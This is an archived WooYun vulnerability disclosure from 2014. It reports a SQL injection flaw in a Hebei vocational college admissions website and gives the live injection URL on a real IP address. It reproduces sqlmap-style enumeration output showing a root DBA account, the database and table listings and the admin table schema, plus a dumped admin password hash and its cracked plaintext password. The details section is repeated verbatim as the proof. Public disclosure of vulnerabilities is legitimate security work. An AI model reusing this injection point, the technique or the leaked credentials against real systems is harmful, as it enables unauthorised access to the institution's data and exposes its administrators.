当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066046

漏洞标题:河北某大学分站存在sql注射漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 浮萍

提交时间:2014-06-24 15:28

修复时间:2014-06-29 15:28

公开时间:2014-06-29 15:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

河北软件职业技术学院招生信息网存在sql注入

Snap1.jpg


注入点
http://221.192.237.91/zsnew/news.php?id=382

Snap2.jpg


web应用信息

web server operating system: Windows
web application technology: PHP 5.3.5, Apac
back-end DBMS: MySQL 5.0
banner: '5.1.22-rc-community'
current user: 'root@localhost'
current database: 'shuyuan'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'


数据库

available databases [6]:
[*] admissions
[*] information_schema
[*] mysql
[*] shuyuan
[*] test
[*] zhaosheng


其中zhaosheng中的表

Database: zhaosheng
[88 tables]
+-----------------------+
| hbsi_addonarticle |
| hbsi_addonimages |
| hbsi_addoninfos |
| hbsi_addonshop |
| hbsi_addonsoft |
| hbsi_addonspec |
| hbsi_admin |
| hbsi_admintype |
| hbsi_advancedsearch |
| hbsi_arcatt |
| hbsi_arccache |
| hbsi_archives |
| hbsi_arcmulti |
| hbsi_arcrank |
| hbsi_arctiny |
| hbsi_arctype |
| hbsi_area |
| hbsi_channeltype |
| hbsi_co_htmls |
| hbsi_co_mediaurls |
| hbsi_co_note |
| hbsi_co_onepage |
| hbsi_co_urls |
| hbsi_diyforms |
| hbsi_dl_log |
| hbsi_downloads |
| hbsi_erradd |
| hbsi_feedback |
| hbsi_flink |
| hbsi_flinktype |
| hbsi_freelist |
| hbsi_guestbook |
| hbsi_homepageset |
| hbsi_keywords |
| hbsi_log |
| hbsi_member |
| hbsi_member_company |
| hbsi_member_feed |
| hbsi_member_flink |
| hbsi_member_friends |
| hbsi_member_group |
| hbsi_member_guestbook |
| hbsi_member_model |
| hbsi_member_msg |
| hbsi_member_operation |
| hbsi_member_person |
| hbsi_member_pms |
| hbsi_member_snsmsg |
| hbsi_member_space |
| hbsi_member_stow |
| hbsi_member_stowtype |
| hbsi_member_tj |
| hbsi_member_type |
| hbsi_member_vhistory |
| hbsi_moneycard_record |
| hbsi_moneycard_type |
| hbsi_mtypes |
| hbsi_multiserv_config |
| hbsi_myad |
| hbsi_myadtype |
| hbsi_mytag |
| hbsi_payment |
| hbsi_plus |
| hbsi_purview |
| hbsi_pwd_tmp |
| hbsi_ratings |
| hbsi_scores |
| hbsi_search_cache |
| hbsi_search_keywords |
| hbsi_sgpage |
| hbsi_shops_delivery |
| hbsi_shops_orders |
| hbsi_shops_products |
| hbsi_shops_userinfo |
| hbsi_softconfig |
| hbsi_sphinx |
| hbsi_stepselect |
| hbsi_sys_enum |
| hbsi_sys_module |
| hbsi_sys_set |
| hbsi_sys_task |
| hbsi_sysconfig |
| hbsi_tagindex |
| hbsi_taglist |
| hbsi_uploads |
| hbsi_verifies |
| hbsi_vote |
| hbsi_vote_member |
+-----------------------+


表zhaosheng中数据

Database: zhaosheng
Table: hbsi_admin
[10 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | char(30) |
| id | int(10) unsigned |
| loginip | varchar(20) |
| logintime | int(10) unsigned |
| pwd | char(32) |
| tname | char(30) |
| typeid | text |
| uname | char(20) |
| userid | char(30) |
| usertype | float unsigned |
+-----------+------------------+


Database: zhaosheng
Table: hbsi_admin
[1 entry]
+----------------------+---------+-------+
| pwd | tname | uname |
+----------------------+---------+-------+
| 6cedc285ea3b5c2015f0 | <blank> | admin |
+----------------------+---------+-------+


经过解密其密码为hbsi123

Database: shuyuan
[9 tables]
+---------+
| actives |
| admins |
| baoming |
| columns |
| focimgs |
| hzyx |
| links |
| news |
| notes |
+---------+


Database: shuyuan
Table: admins
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| grade | varchar(100) |
| id | int(11) |
| instime | int(11) |
| lasttime | int(11) |
| name | varchar(20) |
| password | varchar(32) |
+----------+--------------+

漏洞证明:

河北软件职业技术学院招生信息网存在sql注入

Snap1.jpg


注入点
http://221.192.237.91/zsnew/news.php?id=382

Snap2.jpg


web应用信息

web server operating system: Windows
web application technology: PHP 5.3.5, Apac
back-end DBMS: MySQL 5.0
banner: '5.1.22-rc-community'
current user: 'root@localhost'
current database: 'shuyuan'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'


数据库

available databases [6]:
[*] admissions
[*] information_schema
[*] mysql
[*] shuyuan
[*] test
[*] zhaosheng


其中zhaosheng中的表

Database: zhaosheng
[88 tables]
+-----------------------+
| hbsi_addonarticle |
| hbsi_addonimages |
| hbsi_addoninfos |
| hbsi_addonshop |
| hbsi_addonsoft |
| hbsi_addonspec |
| hbsi_admin |
| hbsi_admintype |
| hbsi_advancedsearch |
| hbsi_arcatt |
| hbsi_arccache |
| hbsi_archives |
| hbsi_arcmulti |
| hbsi_arcrank |
| hbsi_arctiny |
| hbsi_arctype |
| hbsi_area |
| hbsi_channeltype |
| hbsi_co_htmls |
| hbsi_co_mediaurls |
| hbsi_co_note |
| hbsi_co_onepage |
| hbsi_co_urls |
| hbsi_diyforms |
| hbsi_dl_log |
| hbsi_downloads |
| hbsi_erradd |
| hbsi_feedback |
| hbsi_flink |
| hbsi_flinktype |
| hbsi_freelist |
| hbsi_guestbook |
| hbsi_homepageset |
| hbsi_keywords |
| hbsi_log |
| hbsi_member |
| hbsi_member_company |
| hbsi_member_feed |
| hbsi_member_flink |
| hbsi_member_friends |
| hbsi_member_group |
| hbsi_member_guestbook |
| hbsi_member_model |
| hbsi_member_msg |
| hbsi_member_operation |
| hbsi_member_person |
| hbsi_member_pms |
| hbsi_member_snsmsg |
| hbsi_member_space |
| hbsi_member_stow |
| hbsi_member_stowtype |
| hbsi_member_tj |
| hbsi_member_type |
| hbsi_member_vhistory |
| hbsi_moneycard_record |
| hbsi_moneycard_type |
| hbsi_mtypes |
| hbsi_multiserv_config |
| hbsi_myad |
| hbsi_myadtype |
| hbsi_mytag |
| hbsi_payment |
| hbsi_plus |
| hbsi_purview |
| hbsi_pwd_tmp |
| hbsi_ratings |
| hbsi_scores |
| hbsi_search_cache |
| hbsi_search_keywords |
| hbsi_sgpage |
| hbsi_shops_delivery |
| hbsi_shops_orders |
| hbsi_shops_products |
| hbsi_shops_userinfo |
| hbsi_softconfig |
| hbsi_sphinx |
| hbsi_stepselect |
| hbsi_sys_enum |
| hbsi_sys_module |
| hbsi_sys_set |
| hbsi_sys_task |
| hbsi_sysconfig |
| hbsi_tagindex |
| hbsi_taglist |
| hbsi_uploads |
| hbsi_verifies |
| hbsi_vote |
| hbsi_vote_member |
+-----------------------+


表zhaosheng中数据

Database: zhaosheng
Table: hbsi_admin
[10 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | char(30) |
| id | int(10) unsigned |
| loginip | varchar(20) |
| logintime | int(10) unsigned |
| pwd | char(32) |
| tname | char(30) |
| typeid | text |
| uname | char(20) |
| userid | char(30) |
| usertype | float unsigned |
+-----------+------------------+


Database: zhaosheng
Table: hbsi_admin
[1 entry]
+----------------------+---------+-------+
| pwd | tname | uname |
+----------------------+---------+-------+
| 6cedc285ea3b5c2015f0 | <blank> | admin |
+----------------------+---------+-------+


经过解密其密码为hbsi123

Database: shuyuan
[9 tables]
+---------+
| actives |
| admins |
| baoming |
| columns |
| focimgs |
| hzyx |
| links |
| news |
| notes |
+---------+


Database: shuyuan
Table: admins
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| grade | varchar(100) |
| id | int(11) |
| instime | int(11) |
| lasttime | int(11) |
| name | varchar(20) |
| password | varchar(32) |
+----------+--------------+

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-29 15:28

厂商回复:

最新状态:

暂无


漏洞评价:

评论